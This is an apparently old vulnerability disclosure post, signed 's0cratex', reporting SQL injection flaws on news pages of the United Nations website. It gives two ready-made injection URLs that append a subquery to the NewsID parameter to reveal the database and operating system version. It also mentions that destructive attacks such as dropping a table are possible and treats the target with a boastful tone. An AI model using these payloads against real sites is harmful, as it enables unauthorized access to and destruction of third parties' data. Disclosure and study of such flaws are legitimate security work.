un.org SQL Injection vulnerabilities
------------------------------------
by s0cratex


I found a small vulnerability in un.org website...

The bug is type SQL Injection:
http://www.un.org/spanish/News/fullstorynews.asp?NewsID=7702 AND 1 IN 
(SELECT @@version)--
or
http://www.un.org/chinese/News/fullstorynews.asp?NewsID=8000 AND 1 IN 
(SELECT @@version)--

In the example, you can view the version of your Operative System and SQL 
Server...
Other attacks can be possible, for examplo a drop table.

Remember that is the "United Nations" Server...xD

s0cratex@hotmail.com
Nicaragua Exist...
plexinium.com Comming soon

_________________________________________________________________
MSN Amor: busca tu ˝ naranja http://latam.msn.com/amor/